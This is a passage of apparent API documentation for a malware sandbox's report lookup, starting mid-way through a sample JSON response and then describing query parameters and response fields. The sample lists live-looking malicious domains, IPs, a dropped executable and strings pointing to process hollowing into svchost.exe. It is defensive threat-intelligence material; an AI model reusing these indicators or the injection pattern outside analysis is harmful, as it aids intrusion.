"crc32": "00000000",
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
"ssdeep": "3::",
"type": "empty",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"pid": 6968,
"process_name": "svchost.exe"
}
],
"https_ex": [],
"dead_hosts": [],
"domains": [
{
"domain": "bdcrqgonzmwuehky.nl",
"ip": "176.58.104.168"
},
{
"domain": "somicrososoft.ru",
"ip": "3.229.117.57"
}
],
"hosts": [
"3.229.117.57",
"176.58.104.168"
]
},
"dropped": [
{
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"threat_level": "malicious",
"urls": [],
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"size": 64000,
"filepath": "C:\\ProgramData\\Local Settings\\Temp\\msajyt.cmd",
"name": "msajyt.cmd",
"crc32": "49F50535",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"yara": [],
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
],
"strings": {
"5612_88165644311524082025": [
";x\\&:}V*",
"hdll.hsbie",
"kernel32.dll",
".]a[<HI",
"hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst",
"h.dllhpi32hadva",
"!This program cannot be run in DOS mode."
],
"5612_51029104311524082025": [
"ntdll.dll",
"lstrcatW",
"CloseHandle",
"\\syswow64\\svchost.exe",
"\\system32\\wuauclt.exe",
"VirtualFree",
"NtDelayExecution",
"ZwUnmapViewOfSection",
"ZwQueryInformationProcess"
],
"pcap": [
"DESKTOP-H9URB7T ",
"bigcatalog",
"MSFT 5.0",
"Date: Sun, 24 Aug 2025 15:02:07 GMT",
"edgekey",
" EEEFFDELFEEPFACNEIDJFFFCECDHFECA",
"!http://oneocsp.microsoft.com/ocsp0",
"sidnlabs"
]
}
}
Query Parameters
Your API key. For details on how to obtain and manage your API key, please refer to the Authentication page.
Kindly note:
Before calling this API, check that your access IP is bound to the key and that the key has the required permission and quota for this endpoint.
The file hash value used to retrieve the analysis report.
Supports sha256 / sha1 / md5.
Sandbox Runtime Environment
Users can specify the sandbox runtime environment for the file to view dynamic analysis data in that specific environment (including behavioral signatures, process behavior, network behavior, dropped behavior, etc.).
The optional environments include:
- Windows:
- win7_sp1_enx64_office2013
- win7_sp1_enx86_office2013
- win7_sp1_enx86_office2010
- win7_sp1_enx86_office2007
- win7_sp1_enx86_office2003
- win10_1903_enx64_office2016
- Linux:
- ubuntu_1704_x64
- centos_7_x64
- Kylin:
- kylin_desktop_v10
Optional data includes:
- summary
- network
- signature
- static
- dropped
- pstree
- multiengines
- strings
Response
- result: Detection status from each antivirus engine.
- safe: The engine did not detect any threats.
- malware_label: A specific label indicating the type of malware detected. For example, Trojan.e32du.
- scan_time: The exact timestamp when the sample was scanned by the multiple engines. The format is YYYY-MM-DD HH:MM:SS, for example 2019-10-22 16:17:48. The string carries no timezone designator, so confirm which zone it is expressed in before correlating it with your own logs.
Summary Information
A JSON object with the following fields:
- threat_level: Threat level. Four categories: malicious, suspicious, clean, unknown.
This threat level is an overall verdict that combines static analysis, multi-engine detection, and dynamic analysis across multiple sandbox environments.
- malware_type: Threat category.
- malware_family: Malware family, e.g., Xorddos.
- is_whitelist: Whether the file is on the whitelist. true means whitelisted, false means not.
- submit_time: File submission time. Example: 2019-01-22 17:36:21
- file_name: File name.
- file_type: File type.
- sample_sha256: File hash (SHA256).
- md5: File MD5 hash.
- sha1: File SHA1 hash.
- scenes: Scenario detection results.
- Cybercrime: Cybercrime sample.
- CS_Detect: CobaltStrike trojan sample.
- RT_Tools: Red team tool.
- Exploit: Exploit sample.
- tag: Tags. A JSON object containing:
- s: Static tags (JSON array). Example: "Abnormal timestamp". For common tags, see “Common Sample Tags”.
- x: Antivirus engine detection tags (JSON array). Example: "Trojan".
- threat_score: Threat score value.
- sandbox_type: The sandbox environment specified for the current analysis.
- sandbox_type_list: List of all sandbox environments where the sample was successfully analyzed.
- multi_engines: Antivirus engine detection rate. Example: "7/25"
Behavioral Signatures
A JSON array, where each item includes the following fields:
- severity: Severity level (integer). A higher number indicates higher severity.
- references: References (JSON array).
- sig_class: Signature category (string).
- name: Signature name (string).
- description: Behavior description. In the sample response above this is a JSON-encoded string holding en and cn keys, so it has to be decoded a second time rather than read as plain text.
- markcount: Mark count (integer).
- marks: Raw signature data (JSON array).
- families: Associated malware families (JSON array).
- attck_id: ATT&CK technique ID (string; the sample response above shows "T1087", and an empty string when no technique is mapped).
- attck_info: ATT&CK details (JSON object; empty when attck_id is empty).
Static Information
A JSON object.
Process Tree Information
Network Behavior
A JSON object with the following fields:
- fingerprint: Fingerprint information (JSON array).
- tls: TLS protocol (JSON array).
- udp: UDP protocol (JSON array).
- dns_servers: DNS servers (JSON array).
- http: HTTP protocol (JSON array).
- irc: IRC protocol (JSON array).
- smtp: SMTP protocol (JSON array).
- tcp: TCP protocol (JSON array).
- smtp_ex: Extended SMTP protocol data (JSON array).
- mitm: Man-in-the-middle data (JSON array).
- hosts: Network hosts (JSON array).
- dns: Domain Name System (JSON array).
- http_ex: Extended HTTP protocol data (JSON array).
- domains: Domains (JSON array).
- dead_hosts: Unreachable hosts (JSON array).
- icmp: ICMP protocol (JSON array).
- https_ex: Extended HTTPS protocol data (JSON array).
Dropped Behavior
A JSON array, where each item includes the following fields:
- sha1: File SHA1 value (string).
- sha256: File SHA256 value (string).
- md5: File MD5 value (string).
- urls: Extracted URLs (JSON array).
- size: File size (integer).
- filepath: File path (string).
- name: File name (string).
- crc32: File CRC32 value (string).
- ssdeep: File SSDeep value (string).
- type: File type (string).
- yara: YARA matches (JSON array).
Strings Information
A JSON object, where each item includes the following fields:
- sha256: Strings extracted from the file, keyed by the file’s SHA256 value; corresponds to the file’s static strings (array). Note that the keys in the sample response above (e.g. 5612_88165644311524082025) do not look like SHA256 values, so verify the key format against a live response before parsing on it.
- pcap: Strings extracted from network traffic (array).